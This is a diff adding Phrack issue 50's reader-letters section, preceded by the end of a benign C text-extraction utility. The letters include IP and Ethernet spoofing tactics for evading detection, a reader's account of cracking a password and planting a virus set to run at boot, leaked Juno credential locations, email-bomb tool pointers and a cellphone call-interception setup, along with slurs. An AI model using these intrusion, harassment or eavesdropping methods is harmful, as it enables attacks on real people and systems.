+        printf("Usage: %s <inputfile>\n",argv[0]);
+        exit(1); 
+    }
+
+    if(! (f=fopen(argv[1], "r"))) {
+        printf("Could not open input file.\n");
+	exit(1);
+    }
+
+    while(fgets(b, 256, f)){ 
+
+        if(!strncmp (b, s, l)){ 
+	    b[strlen(b)-1] = '\0'; 
+
+	    if((bp=strchr(b+l+1,'/')))
+	        while (bp){ 
+		    *bp='\0';
+		    mkdir(b+l, 0700); 
+		    *bp='/';
+		    bp=strchr(bp+1,'/'); 
+		}
+	    if((o = fopen(b+l, "w"))) 
+	        printf("- Extracting %s\n",b+l);
+	    else {
+		printf("Could not extract '%s'\n",b+l);
+		exit(1);
+	    }
+	} 
+        else if(!strncmp (b, e, n)){
+	    if(o) fclose(o);
+	    else {
+	        printf("Error closing file.\n");
+		exit(1);
+	    }
+        } 
+        else if(o) {
+            fputs(b, o);
+            i++;
+        }
+    }
+    if(!i) printf("No extraction tags found.\n");
+    return(0);
+}
+
+---------------------8<------------CUT-HERE----------->8---------------------
+
+EOF
+
diff --git a/phrack50/2.txt b/phrack50/2.txt
new file mode 100644
index 0000000..e3bdd93
--- /dev/null
+++ b/phrack50/2.txt
@@ -0,0 +1,1411 @@
+                                .oO Phrack 50 Oo.
+
+                            Volume Seven, Issue Fifty
+
+                                     2 of 16
+
+                                 Phrack Loopback
+
+-----------------------------------------------------------------------------
+  
+
+Hi,
+          I have a story of violations of freespeech and censorship and
+if I am busted unjustly, please publish this story to the public.
+Yesterday some faggot e-mailed me with a ton of ascii crap that
+took me an hour + to DL.  WHen I finished DLing it, windoze stalled and I
+had to restart..  So  naturally I was pissed off.  The reason this guy
+said he did this was because I posted a cheat program for the game
+Diablo on my webpage and he doesn't like cheaters.  Today he e-mailed me 
+again with ascii crap.....I was beyond pissed....so I did what anyone in 
+my position would do....Imailbombed him ... about 600 msg's or so.  
+I used Kaboom3 and an SMTP I thought (Looked like it from port 25) was 
+anonymous and untraceable.
+       As it turns out, 2 hours later the head of security at Earthlink
+(my current ISP) called and said that someone from my account had e-mail
+bombed this person. The security guy said that the person I bombed
+complained to his ISP because it "put out his business for hours." His
+ISP traced it to Earthlink and then to me, by contacting the earthlink
+security guy and having him look in the logs for who was connected to
+the ip (dynamic) they saw in the bomb messages at the time the bombing       
+occurred. He also said that the guy I bombed called the FBI and got them
+involved in it. Is this sounding fucking ridiculous yet?  First of all,
+any reputable business presumably has a better-than-28.8 connection,
+which means it would have taken this guy a couple seconds to DL my bomb.
+Secondly, even if he doesn't have a T-1, at 28.8 it would take 2 hours
+or so, maybe less.  But the FBI is involved.....   I can't fucking
+believe it!  So naturally the first thing I do is e-mail all the
+reputable hackz known to me.  This is ridiculous, this is
+oppressive, this is BIG BROTHER!
+
+                                           Yours,
+                                       GrEeNbEaSt
+
+
+[ So, what exactly is it that you want us to do, besides burst into fits
+of uncontrollable for several minutes at a time? ]
+
+-----------------------------------------------------------------------------
+
+
+Hey, in phrack 48, the article on IP spoofing says you need to sample to
+TCP sequence numbers of the host you are attacking.  The method is
+suggests is to connect via SMTP and then drop the connection.  There is
+a problem with this - sendmail usually logs failed mail transfers, so
+the host will probably be able to correlate this with the time of the
+attack and find out who you are.  Further, this connection must be done
+from a non-spoofed IP address to guarantee you get a returned packet.
+There are two options available here:
+
+1) Forge the sequence sampling connection as another host on your subnet
+(although if they contact your provider and your provider logs massive
+data, you're busted - also this will not work if the local network uses
+an active hub)
+
+2) Make sure to remove these traces if you manage to crack the machine -
+this is all or nothing - if you fail to crack it, but left indicators of
+an attack, you are screwed. (again only if your provider logs heavily)
+
+If you want to circumvent these dangers altogether, simply sample the
+sequence numbers from some highly non-logging port.  The standard inetd
+server for UNIX runs a TCP echo, discard and chargen service, which you
+can get sequence numbers from, and does not log anything.
+
+There are two complications to this attack which are becoming
+increasingly used, and which effectively prevent it.
+
+1)  Some providers do not allow foreign IP addresses to go out of their
+subnet as source IP addresses - this is done through router blocking.
+Most sites just don't give a damn or are too stupid to figure out how to
+do it, but the number of providers doing this is increasing.  You could
+try to hack their router - easy to find, do a traceroute, but chances of
+success are slim if it doesn't allow remote logins.  Also, your ISP will
+know if this happens, and may take additional precautions immediately
+(such as grabbing your ethernet address if you are on a local network -
+then you are f!!ked)  We don't want any minors reading this to see any
+offensive words, do we - oh lord, they might even ban phrack in the
+state of Texas.  No offense to anyone from Tx unless they deserve it.
+
+2)  Some OS's use pseudo-random number generators to create TCP sequence
+numbers at the beginning of each connection.  This is easy to do under
+Linux, and I think some commercial OS's might even be doing this now
+(anyone have confirmation of the rumor that Solaris now does this?)
+Now, this is easy to check for - connect twice in immediate succession
+and see if you get two sequential (or close) numbers.  However, a
+workaround for this would be to generate pseudo-random sequence numbers
+for the first connection from a given IP address (and then again when
+the IP layer no longer has any knowledge of this IP address)  If a site
+was running non-crypto pseudo-random sequences, it would be possible to
+analyze it using a spectral test to try to predict sequence numbers, but
+if they use a cryptographically secure sequence generator, you would
+have to break it (probably not too hard since any highly secure crypto
+sequence would make IP response time unreasonably slow)  A
+counter-solution to this would be to generate random numbers in low cpu
+load time, and have a buffer of them for later use.  Here, we could
+probably go on forever with attacks and countermeasures, so lets stop
+now, as a cure for sanity.
+
+As an aside note for the highly paranoid:  ethernet spoofing
+
+Note: some of this is theorized, and might not be 100% accurate - if you
+get the jist of it, you should be able to figure out if it works for
+you.
+
+It is possible to spoof ethernet hardware addresses as well.  Some cards
+will allow you to do this easily, but you need to have card programming
+docs (check the Linux kernel source for your card driver-!!).  Others
+won't let you do it at all, and require a ROM change, or worse it might
+be solid state logic on the card - EVIL.  Course you might be able to
+get around solid state stuff by recoding the ROM, but I wouldn't
+recommend it unless you don't have the $70 to buy a new card, and have a
+month or two to spend in the basement.
+
+If you make up an ethernet address, you should probably use a real card
+identifier (the first three bytes).  This is because some sniffing
+software raises warning flags when unknown card identifiers pop up, and
+this software is run by more network admins than I'd like to think.
+
+Some new hub technologies may limit this type of spoofing- most notably,
+active hubs wouldn't allow it at all.  Other new hub designs use
+mappings of ethernet address to specific ports on the hub, so you might
+not be able to change the address without turning off the machine,
+waiting for the hub to time out the address, and rebooting.
+
+Ethernet hardware address spoofing will make a machine completely
+undetectable, provided it is not the only machine on a network that is
+being monitored.
+
+There may be a way around active hubs, and this is multicast ethernet
+addresses.  Any network card capable of multicast should be able to send
+packets with an ethernet multicast address.  This address is not
+specific to each card, as many cards can send and receive on the same
+multicast address.  The problem here is router and hub technology may
+have already advanced to the point where it can distinguish multicast
+ethernet addresses and convert them to multicast IP addresses, which
+would not allow you to spoof.  This is only theoretical - I haven't
+tried it, don't know anyone who has, and have never even heard rumors
+about it.
+
+Note : this information is in no means comprehensive - I don't have the
+time or resources to study it, but most likely results in ethernet
+spoofing vary by the manufacturers of the network hardware all the way
+down the local line - (i.e - ethernet card all the way to the first
+gateway)
+
+Another aside: return path rerouting
+
+In return path rerouting, the IP spoofing attack follows the same
+general principal, except that the attacking machine gets reply packets,
+and does not need to operate blind.  There are three ways to make this
+work:
+
+1)  Pretending to be a trusted host on your subnet
+    Easy, just pick up packets destined for the trusted machine which
+    look like responses to your forged packets, and send on their IP
+    address, and SYN flood their machine.  This will even work past
+    blocking ISP's
+
+2)  Source routing attack
+    Medium difficulty, you have to construct a path between your machine
+    and the target, and a path between your machine and the trusted host
+    (although the last part can be made up).  Use this and either the
+    strict or loose IP routing option, and all packets will come back to=20
+    you.  This will not work nearly as much, since many hosts and=20
+    routers discard source routed packets (it is a well-known flaw in=20
+     TCP/IP now).  However, mightn't buggy implementations only discard
+    one type of source routing?
+
+3)  Experimental - ICMP redirect attack
+    Try using ICMP redirects to redirect the packets back to the=20
+    attacking machine.  ICMP redirects should only be accepted to=20
+    machines on a local subnet, but buggy implementations might not do
+    this correctly (actually, I think the Host Requirements RFC says=20
+    this is recommended, not required).  Also, it may be possible to   =20
+    create a path using redirects or forged routing updates to direct
+    traffic to a trusted site back to the attacking site.  After the
+    attack, the routing information could be repaired, making it seem
+    like a temporary network failure.  If anyone followed this and knows
+    what I mean, let me know if you think it's possible.    =20
+
+Thanks
+
+Zach
+
+[ Zach, you have good ideas and points.  Now, why haven't YOU written
+  an article for Phrack???
+
+  You should...<hint><hint> ]
+
+-----------------------------------------------------------------------------
+
+DEATH TO THE INNOCENT
+
+
+ I WENT TO A PARTY, MOM, I REMBERED WHAT YOU SAID.
+ YOU TOLD ME NOT TO DRINK, MOM, SO I DRANK SODA INSTEAD.
+ I REALLY FELT PROUD INSIDE, MOM, THE WAY YOU SAID I WOULD.
+ I DIDN'T DRINK AND DRIVE, MOM, THOUGH THE OTHERS SAID I SHOULD.
+ I KNOW I DID THE RIGHT THING, MOM, I KNOW YOUR ALWAYS RIGHT.
+ NOW THE PARTY IS ENDING, MOM, AS EVERONE IS DRIVING OUT OF SIGHT.
+
+ AS I GOT INTO MY CAR, MOM, I KNEW I'D GET HOME IN ONE PIECE.
+ BECAUSE OF THE WAY YOU RAISED ME, SO RESPONSIBLE AND SWEET.
+ I STARTED DRIVING AWAY, MOM, BUT AS I PULLED INTO THE ROAD,
+ THE OTHER CAR DIDN'T SEE ME, MOM, AND HIT ME LIKE A LOAD.
+ AS I LAY HERE ON THE PAVEMENT, MOM, I HEAR THE POLICE MAN SAY,
+ THE OTHER GUY IS DRUNK, MOM, AND NOW I'M THE ONE WHO WILL PAY.
+ I'M LYING HERE DYING. MOM, I WISH YOU'D GET HERE SOON.
+
+ HOW COULD THIS HAPPEN TO ME, MOM? MY LIFE JUST BURST LIKE A BALLOON.
+ THERE IS BLOOD ALL AROUND ME, MOM, AND MOST OF IT IS MINE.
+ I HEAR THE MEDIC SAY, MOM, I'LL DIE IN A SHORT TIME.
+ I JUST WANTED TO TELL YOU, MOM, I SWEAR I DIDN'T DRINK.
+ IT WAS THE OTHERS, MOM. THE OTHERS DID NOT THINK.
+ HE WAS PROBIBLY AT THE SAME PARTY AS I.
+ THE ONLY DIFFERENCE IS, HE DRANK AND I WILL DIE.
+
+ WHY DO PEOPLE DRINK, MOM? IT CAN RUIN YOUR HOLE LIFE.
+ I'M FEELING SHARP PAINS NOW. PAINS JUST LIKE A KNIFE.
+ THE GUY WHO HIT ME IS WALKING, MOM, AND I DON'T THINK IT'S FAIR.
+ I'M LYING HERE DYING AND ALL HE CAN DO IS STARE.
+
+ TELL MY BROTHER NOT TO CRY MOM, TELL DADDY TO BE BRAVE.
+ AND WHEN I GO TO HEAVEN, MOM, PUT DADDY'S GIRL ON MY GRAVE.
+ SOMEONE SHOUYLD HAVE TOLD HIM, MOM, NOT TO DRINK AND DRIVE.
+ IF ONLY THEY HAD TOLD HIM, MOM, I WOULD STILL BE ALIVE.
+
+ MY BREATH IS GETTING SHORTER, MOM. I'M BECOMING VERY SCARED.
+ PLEASE DON'T CRY FOR ME, MOM, WHEN I NEEDED YOU, YOU WERE ALWAYS THERE.
+ I HAVE ONE LAST QUESTION, MOM, BEFORE I SAY GOODBYE.
+ I DIDN'T DRINK AND DRIVE, MOM, SO WHY AM I THE ONE TO DIE?
+
+[ Interesting...booze, violence.  Now, if only this little story had
+  some forced sodomy of teenage schoolgirls...
+
+  Man, I have no shame...drinking and driving is evil, and will get you
+  shot in Central America for attempted homicide.  That's why I take
+  cabs or hang around with 12-steppers or mormons.  Either way, it gives
+  you someone to subject to your drunken ravings.
+
+  Now why this was sent to Phrack, I have no idea.  ]
+
+-----------------------------------------------------------------------------
+
+I just have one question, i just moved back down to Texas from NY,,,
+is there any one at phrack that knows local BBS numbers for san antonio???
+
+thanx for the help,
+
+[In almost any city with running water and electricity (and yes,
+ even San Antonio qualifies as of this writing), in any local computer
+ store you will find local compu-nerd publications.  I think in San Antonio
+ its "Computer User."  In any case, in the back are usually listings of
+ local bulletin boards.  Start with these, and eventually you will come
+ across the kinds of bulletin boards you really want. ]
+
+-----------------------------------------------------------------------------
+
+The trial of the Danes arrested in the article I wrote in #47 has now
+ended. No jail sentences, just community service up to 200 hours (me)
+and a fine of 30.000Dkr. (apx. $5000).
+
+Anyway, remember I wrote you about the article being quoted and
+translated to Danish in a Danish magazine? Well, after the same magazine
+published our REAL names, adrs with the advice not to hire us for any
+jobs I got pretty sick of them and sent them a bill of DKr 5000, billing
+them for my article.=20
+
+Of course, they won't pay me (would rather go to court) so now I'm
+considering taking them on their word. The company I'd be going after
+is a daughtercompany of Coopers & Lybrand and is called Institute of
+Datasecurity. Most of their employees seem to be notorious idiots, always
+proclaiming themselves in the media with the anecdotes of yesterday. They
+even gave out an award (money) to the DA who prosecuted us for doing
+a nice job!=20
+
+Well, since they didn't only violate my personal copyright but also the
+restrictions of Phrack Magazine itself, I wanted to know if I could get
+your support?  Just some kind of written statement about the policy of
+the magazine, whether or not they paid you for it, etc.
+
+In a hurry, dont mind the mistakes,
+
+Le Cerveau
+
+[ Can you please send a photocopy of that article to us at the Phrack
+  mailing address?  Maybe we can help.
+
+  I really don't have much respect for the accounting firms "computer
+  security" teams, and never have.  In the years they've been doing this
+  work, they STILL don't get it.
+
+  It's too bad you aren't in America.  You could probably sue the living=
+ hell
+  out of everyone involved, if they really did publish your names
+  and advise people not to hire you for work.  ]
+
+-----------------------------------------------------------------------------
+
+HEY Whats up,
+I was wondering if U could tell me how to e-mail bomb Please!!!!=20
+
+[No, that's a stupid thing to do.
+
+ But, if you insist....
+
+ Go do a WWW search for the program "UpYours"  This should
+ suit your needs just fine. ]
+
+-----------------------------------------------------------------------------
+
+Hello,
+
+I was wondering if you know where i can get copies of "The Journal of
+Privileged Information"? I have issues 1-5, and i`m looking for 6 -
+present. If you know where i can get them, it would be greatly
+appriciated!! thanx
+
+techcode
+
+[ I'm not really familiar with this magazine, but if anyone out there
+  has copies of this, email us with information on where to get more. ]
+
+-----------------------------------------------------------------------------
+
+Dear Phrack,
+
+Great job on issue 49.  I enjoyed the section in Line Noise about ID
+machine hacking.  Anyway, I wanted to say that Phrack rules; it is by
+far my favorite computer hobbyist magazine.  By the way, I remember reading=
+ a
+letter that a reader sent in, about some queer selling bound volumes of=
+ Phrack,
+LOD Tech Journals, and virus source code.  A similar occurance happended to
+me when I found that some wannabe-elite pseudo-hacker was selling printed
+copies of Phrack, 40 Hex, Digital Free Press, and Xeroxed copies of=
+ alt.2600.
+I was curious, to say the least, and felt compelled to defend the honor of
+those aforementioned publications.  I talked to the fag, and I gained his
+trust by using undecipherable hacker jargon that he seemed awed by.  It=
+ turns
+out that he had been distributing pirated junk on his PC, using an=
+ unregistered
+copy of Serv-U.  I gave him a registration crack, and in return he gave me=
+ an
+account on his machine, so I could download his warez.  I logged on to
+his PC one day, and I quickly found the serv-u.ini file with the encrypted
+passwords.
+
+Since Serv-U uses Unix style encryption, I cracked his personal account
+in about 17 minutes.  He kept a TCP/IP connection open from 4pm to 11pm
+every evening, and I logged on as him one day.  I uploaded a virus to the
+windows system directory and renamed it something benign, and then I edited
+his autoexec.bat to execute it (I also used Fixtime from the Nowhere
+Utilities 2.0 to make it smooth).  I haven't heard from him since.  That
+one was a simple job to protect the rights of cool magazines like Phrack!
+
+Take it easy, and keep the issues coming.
+
+dethbug
+
+[ If only all readers were as loyal.  Or better yet, if only all readers
+  sent us a dollar!
+
+  Seriously though...a virus was a bit much, but since we weren't there
+  to sue to protect our copyright...
+
+  But uh, let it be known that you were not directed by, nor acting as an
+  agent of Phrack Magazine, and any and all such behavior was done
+  purely on your own behalf.  :)  ]
+
+-----------------------------------------------------------------------------
+
+Does this cost anything ?=20
+LORDCYBRON
+
+[ Unfortunately it does, but only your mortal soul. ]
+
+-----------------------------------------------------------------------------
+
+Phrack,
+
+We would like permission to republished Chris Goggans'
+(Erik Bloodaxe) editorials from issue 4.42 to issue
+7.48 in Node9: An E-Journal of Writing and Technology.
+
+http://node9.phil3.uni-freiburg.de
+
+There is a lot of interest in hacker culture in
+cultural studies, and Chris Goggans' editorials give
+a good snapshot of the hacker's side of the from
+last three years.=20
+
+We could tell our readers to simply go to Phrack and get
+the editorials themselves, but putting the editorials
+together makes them more effective. Plus, for many of
+our readers, a number of names, terms, events need to
+be annotated.
+
+Jon Adams=20
+
+[ Well Jon, Phrack has always had a policy of letting people reprint
+  articles / editorials / whatever as long as all pieces remain
+  intact with all credit given to the original author and to Phrack
+  Magazine.  If you can do that, feel free to use the editorials. ]
+
+-----------------------------------------------------------------------------
+
+Hi Hackers
+=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
+
+I have only one question for you, please answer me. I read in your magazine
+
+>                              =3D=3DPhrack Magazine=3D=3D
+>
+>                 Volume Seven, Issue Forty-Eight, File 10 of 18
+>
+>              Electronic Telephone Cards: How to make your own!
+>              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Its very excelent for people who live in country when used the cards from=20
+Gemplus, Solaic, Schlumberger, Oberthur: (French cards 256 bit). But I live=
+ in=20
+Slovak Republic and in this country we use The cards from ODS, Giesecke &=20
+Devrient, ORGA Karten systeme, Uniqua, Gemplus, Schlumberger and Oldenbourg=
+=20
+Kartensysteme (German cards 128 bit).
+
+I am was reading in some paper that some people have emulator of these=20
+telephone cards (German card). Emulator with PIC procesor.
+
+But I very very long time searching Internet and I have not information how=
+=20
+I make this emulator. Only in your magazine I found help how I make=20
+emulator but emulator which emulate french telephone card but I need=20
+emulator which emulate german telephone card.
+
+Please help me if You know some adress where I can find information=20
+HOW I MAKE TELEPHONE CARD EMULATOR (WITH PIC PROCESSOR) WHICH EMULATE=20
+TELEPHONE CARD TYPE GERMAN TELEPHONE CARD (128 BITS).
+
+Thanks very much, for your answer. realllly thanks, i am waiiiiting.
+
+!!!!!  M A X O  !!!!!
+
+[ Actually, we don't but perhaps this request will bring in some
+  information from people in Germany.  ]
+
+-----------------------------------------------------------------------------
+
+
+Can you please send me some hacker stuff that I can use on AOL.
+
+THANX
+
+[ The most important tool a hacker can have is a brain.  Unfortunately,
+  since you are on AOL, it appears that your tool box is empty.  Perhaps
+  you'd be more interested in some cool beavis & butthead .WAV files... ]
+
+----------------------------------------------------------------
+
+Looking for talented hackers for special projects.
+First project concerns breaking source code.  Please respond.
+
+Justin Raprager=20
+<adamas@raprager.com>
+
+[ You probably can't afford any of us on the Phrack Staff.
+  Your request is being passed on the the readers.  ]
+
+-----------------------------------------------------------------------------
+
+     Is your web site the best kept secret on the Internet?
+
+     We'll promote it to 50 search engines and indexes for $85
+     and complete the job in 2 business days.  Satisfaction is
+     guaranteed!
+
+   Owl's Eye Productions, Inc.
+   260 E. Main Street
+   Brewster, NY 10509
+   Phone: (914) 278-4933
+   Fax:     (914) 278-4507
+   Email: owl@owlsnest.com
+
+[ Now, if our site is a secret, then how did you morons know about us?
+  I think a better sales pitch is:
+
+  "Is your Web Site Secure?"
+
+  We'll give your info to several million hackers for FREE who will be
+  sure to subject it to an extesive battery of security testing ranging
+  from exploitation of remote security vulnerabilties to denial of service
+  attacks.  Your site will be profiled continuously for months until
+  people grow tired of causing you grief.
+
+  Would Owl's Eye Productions, Inc. care to be the first for this
+  amazing new service?  Let us know.  ]
+
+-----------------------------------------------------------------------------
+
+From: Ray Wardell <ray.wardell@novix.com>
+To: phrack@well.com
+Subject: FUCK YOU
+
+FUCK YOU ... YOU DUMB ASS SHIT HEAD... FUCK WITH ME AND DIE...
+
+[ Uh, ok. ]
+
+
+-----------------------------------------------------------------------------
+
+
+Hi, I would like to become a hacker. I just watched that movie HACKERS. It
+got me all siked up. If you could give me some information on how to
+become one, I would be apreciative.
+
+[ So if you had watched "Buttman Goes To Budapest" then Stagliano would
+  be getting this email instead of Phrack?
+
+  Dude...it was only a movie.  And a bad one at that. ]
+
+-----------------------------------------------------------------------------
+
+Hi there !
+
+Your article of the PIC16C84-Phonecard includes a uuencoded part
+that contains the file "telecard.zip". telecard.zip contains the file
+telecard.pcb which was created with Tango PCB Series 2.
+My version of Accel Tango PCB Version 12 is not able to read this file.
+So, I want to ask you, if its possible to send me this file in ASCII-Format
+or (better) in a graphic-format like PCX or GIF.
+A HP-Laserjet-prn-viewer would be useful, too.
+I was also not able to read the schematic-file. Maybe you know a
+location on the internet where I can get an evaluation version of the
+older version of Tango PCB Series II.
+
+[ Actually, we've got the same problem here at Phrack.  Anyone out there
+  who can help, please send us email and we'll get it out to the
+  masses! ]
+
+-----------------------------------------------------------------------------
+
+Hi my name is Konrad. I live in Ottawa, Onratio (Canada). I have a
+question about one thing. When I download a trial program from internet,
+it is only good for 30 days, and when it expires it writes that, to some
+file so I tried reinsalling and redownloading the program, but when I
+tried to run it, it gave me a message that this version is expired and
+that I have to purchase the program. Do you know, to what file it
+registers that it has expired, and how to disable it. If you don't know
+how to do it, maybe you know someone that might be able to do it, and
+forward my address to them. It is very important to me, because I'm
+finishing a home page called Teen Online and my graphic program expired
+(TrueSpace2) and there is no way that I can afford it, so I rather stick
+to trial version. Ok... Thanks for your time.=20
+						Konrad
+
+[ Usually you can simply reinstall these trial programs and use them
+  for another 30 days.  With others, you can change your system date
+  back, or edit a date in an INI file.  It all depends on the program.
+  Try some of these things and let us know what works. ]
+
+-----------------------------------------------------------------------------
+
+Why don't you write somthing for the bulgarian hackers?
+(recent:take a look at everything that happened in Varna, Bulgaria this=
+ year)
+
+M a n i a X    K i l l e r i a n
+
+[ We'd love to print something about the Bulgarian scene.  Honestly,
+  I have no idea what happened in Varna, nor would I know where to look.
+
+  Here's a novel idea:  Since you are IN Bulgaria, why don't you
+  write something about it for us! ]
+
+-----------------------------------------------------------------------------
+
+I'm using BPI Accounts Receviable System Version 1.10 for IBM
+Released September 1983
+
+It has whats called a "key disk" that allows only the person with that
+disk to closeout the program or month. The problem is this, when I make
+a copy of this Key Disk the files match the original to the T.. There are
+only 2 files involved.  But, when I try to closeout, BPI asks me to insert
+the Key Disk and press enter to proceed.  When I do this with the "copy"
+of the Key Disk the BPI program tells me that the copy is not a Key Disk.
+This only happens with the copy, any ideas?=20
+
+Both Key Disks contain the same information.  If I try to activate the
+close directly from the Key Disk Copy it tells me that it can't find a
+file, basrun.exe I checked and this file is part of the BPI Directory on C:
+I've used this accounting software for many years and it works well.
+But I'm afraid the good Key Disk may go bad one day and I'll be stuck.
+Thats why I'm trying to make a copy.  Any help would be appreciated.
+
+[ Obviously there is something else on that disk that a normal copy
+  is not getting.  Maybe something as simple as a volume label or
+  some hidden files.
+
+  The easiest thing to do to get around this is make a sector by sector copy
+  to a disk image file using some kind of program like the UNIX command "dd"
+  and then copy that image back onto a blank diskette. ]
+
+-----------------------------------------------------------------------------
+
+Hi!
+
+Here I have something for you, which may be interesting in your news=
+ section.
+
+Sometime during the night between Saturday April 5th and Sunday April 6th,
+hackers broke into one of Telenor Nextel's webservers and deleted the=
+ homepages
+of 11.000 private customers and 70 corporate customers, among them the=
+ homepages
+of Norway's two largest newpapers VG and Dagbladet, and the largest online=
+ news
+magazine, Nettavisen.
+
+The hackers somehow got access to hidden scripts, and after modifying and
+manipulating them ran them, thereby deleting all the files mentioned.
+
+Early Sunday, the ISP Telenor Nextel started restoring files from a backup=
+ made
+Saturday, but after encountering problems with that one, they had to restore
+from Tuesday's backup. Saturday's backup will be added sometime during=
+ Monday.
+=D8kokrim, Norwegian police's department for Economic Crime has been=
+ contacted.
+=09
+Reactions:
+
+Sverre Holm of Norway's Organization for Internet Users (http://www.ibio.no)
+criticize Telenor for lack of proper information, as well as an unhealthy
+attitude. In response to Telenor's comment that they can't guarantee this=
+ won't
+happen again, he says, "Such an attitude can't be tolerated. If this is what
+Telenor means, then we have a serious problem here."
+
+Other reactions will surely come in the next days.
+
+References (all in Norwegian):
+
+Telenor Internett:
+   http://internett.telenor.no/
+Scandinavia Online:
+   http://www.sol.no/      (Telenor's online service)
+SOL Direkte:
+   http://www.sol.no/snpub/SNDirekte/index.cgi?kategori=3DNett-Nytt
+Nettavisen:
+   http://www.nettavisen.no/Innenriks/860330846.html
+
+I hope this could be interesting to you, and a candidate for your news flash
+pages. Unfortunately, any references included are to pages in Norwegian, but
+anyone with you speaking either Norwegian, Swedish, or Danish should be able=
+ to
+get more information.
+
+Cheers,
+O L I K
+
+[ We here at Phrack always want to know what is going on out there on
+  planet Earth.  Keep us informed of anty other developments! ]
+
+
+-----------------------------------------------------------------------------
+
+
+I'm investigating some informatic viruses who infect images generating
+new fractalized images with a never seen beauty and singularity. Or may=20
+be they investigate me. These viruses could broke sohemer in many diverse=20
+disciplines like art, artificial life, fractals maths, digital image..=20
+if you look web's images http://antaviana.com/virus/angles.htm you will=20
+understand everything. I would be acknowledged if you could help me, and=20
+it is posible i would like you to diffusse this subject in your interesting
+publication.
+
+In the name of biodiversity, if you have these VIRUSES,
+PLEASE DON'T DISTROY THEM.
+
+[ Ok.  We won't. ]
+
+
+-----------------------------------------------------------------------------
+
+
+Hi !
+
+I read In Volume Seven, Issue Forty-Eight, File 11 of 18 - How to make own
+telephon card . But when i try to make it , this card didnt work !  I try
+all things, and  i try to find more informations about telephone cards, but
+i still dont know what's wrong !
+But today i found on http://www.hut.fi/~then/electronics/smartcards.html
+that there is some errors, but there is no information what's wrong.=20
+So i decidet to write to Phrack magazine , becouse in article is eriten to
+mail all questions to Phrack....=20
+Please send me info what is wrong, and how i must change the ASM program to
+work correctly or just PLEASE send me email of contact person who knows how
+to !!
+
+Thanx in advance !
+
+Marko
+
+[ Obviously that little smartcard article caused a stir.  We've got all=
+ kinds
+  of email about it.  We'll see what more we can dig up, but we are going
+  to really need some help from Europeans and South Americans.  (Smart
+  cards are not in use here in America!) ]
+
+
+-----------------------------------------------------------------------------
+
+
+LOA is back!!! Visit our new page at:
+
+http://www.hackers.com/LOA
+
+Check it out and be sure to send your comments to revelation@hackers.com
+Volume 2 of The Ultimate Beginner's Guide To Hacking And Phreaking has been
+released as well, so be sure to download it and send me your comments. Be
+sure to check out the LOA Files section to view and download past, present,
+and future LOA Projects. Take it easy all...
+
+[ No offense intended, but did you ever wonder why there were so many
+  "Legions of" whatever after LOD?
+
+  We'll put a link up to your page though... ]
+
+
+-----------------------------------------------------------------------------
+
+
+Hey, did you know that Juno (the nationwide free email service) has PPP
+access? Free? To superusers only? Who login directly to their terminals
+that have no ANI? And that they are complete fucking idiots, because in
+every juno.ini file buried deep in the /juno/user00000x/ directory there is
+a section called "Variables" which lists at least one Juno server account,
+i.e. "junox14" and a password for it. These work. Not that I've tried them,
+or do this, or can be held in any way legally responsible for my non-PGP
+encrypted actions, which do not show my views, and are protected under the
+1st Amendment.
+
+Sorry, didn't feel like using alternate caps today.
+
+l8r,
+
+-dArkl0rd-
+
+[ Interesting.  We'll have to get the Juno software and play
+  without the advertisements!
+
+  Thanks, Mr. Shaw ]
+
+
+-----------------------------------------------------------------------------
+
+
+Hi. I've got a strange request. We're putting together a case that
+encourages the U.S. to loosen its encryption export policies.
+
+Do you know of any written resources that discuss the ability of hackers
+to break into NASA, tamper with launches or satellites? The folks at
+infowar.com insist that it is possible, but say that confidentiality
+won't allow them to publish that fact.
+
+We need written evidence to document the case, you understand.
+
+Anyway, I'd appreciate hearing from you.
+
+Jonathan
+
+[ I'd suggest you talk to Emmanuel Goldstein at 2600.  The whole
+  satellite thing came from a bogus post back in the early 80's
+  on a BBS in New Jersey called "The Private Sector."  Reporters
+  siezed on it, resulting in headlines like "Wiz Kids Zap Satellites."
+
+  2600 wrote about this in I believe 1984 or 1985.  Check with them for
+  better details.  ]
+
+
+-----------------------------------------------------------------------------
+
+Queridos crackeadores:
+
+Les quiero pedir si no saben de donde puedo sacar programas para
+crackear y phrackear.
+=20
+Desde ya mucahas gracias:
+Mauricio
+
+[ Existan muchos programas en sitos de FTP y WWW en todos los piases
+  del mundo.  No sabes de donde puedes sacarlos?  Compredes
+  "Webcrawler" o "Excite"?  Dios mio.  ]
+
+-----------------------------------------------------------------------------
+
+Hi Phrack;
+
+Intro to Telephony and PBX systems in Phrack#49 was excellent, pulled a=20
+lot of things together for me.  That's probably the clearest, most=20
+concise explanation of the phone system that I've ever read.  Hopefully=20
+Cavalier will be up for many more articles like that in the future.
+
+respects,
+jake
+
+[ Thanks!  Hopefully we can continue have more telephony related articles
+  in the future.  It is fast becoming a lost art in today's hacker
+  community. ]
+
+-----------------------------------------------------------------------------
+
+
+hey.. a Note To Say, 1-Greetings From IreLand..
+		     2-Thanks A million.. I love Phrack..
+		     3-Where Is The NexT Issue.. Whats up doc..=20
+		     4-do ya have info/schematics on the shit that allows one
+		       to break into cellfone conversation and chat briefly
+		       to callers, as described in winn schwartaus excellent
+		       article on Defcon ][ ?Cellfone
+		     5-Is Phrack on a Mailing List?? if so, Can ya Stick me
+		       On it?
+Many ThanKs
+NasTy Nigel,
+[PhreaK PowEr]
+
+[ 1. Greetings to you too gobshite!
+  2. Thanks!
+  3. You're reading it.
+  4. Not that I was in the room making those calls mentioned
+     in that article or anything, but...  :)
+     An Oki-900 with CTEK cable hooked to a PC running omnicell tracking
+     calls.  A motorola brick phone in debug mode, hooked to a 25db gain
+     yagi antenna (on a tripod) pointed out the window.  As Omnicell locked
+     in on interesting calls, the Motorola was tuned to the corresponding
+     channel, Tx Audio turned on, various humorous interrupts were uttered,
+     and Tx Audio turned off so the party being "contacted" wouldn't be
+     thrown off their cell channel by our more powerful broadcast.
+     Very simple.
+  5. The mailing list now is so huge that it will only serve to let people
+     know when issues are going out, special bulletins, etc.  Mailing out
+     a meg to almost 30,000 people causes serious problems to the Internet,
+     so we decided to make the change. ]
+
+-----------------------------------------------------------------------------
+
+I just wanted to drop a line and say that you guys are doing a great job
+with the zine. I just got issue 49 and I'm looking forward to reading it.
+I'm sure you've heard of The Works, the bbs with the most text files in the
+US. Well, it's finally back online, after six months in the gutter. For the
+best text files and the coolest users east of the Mississippi, call us up.
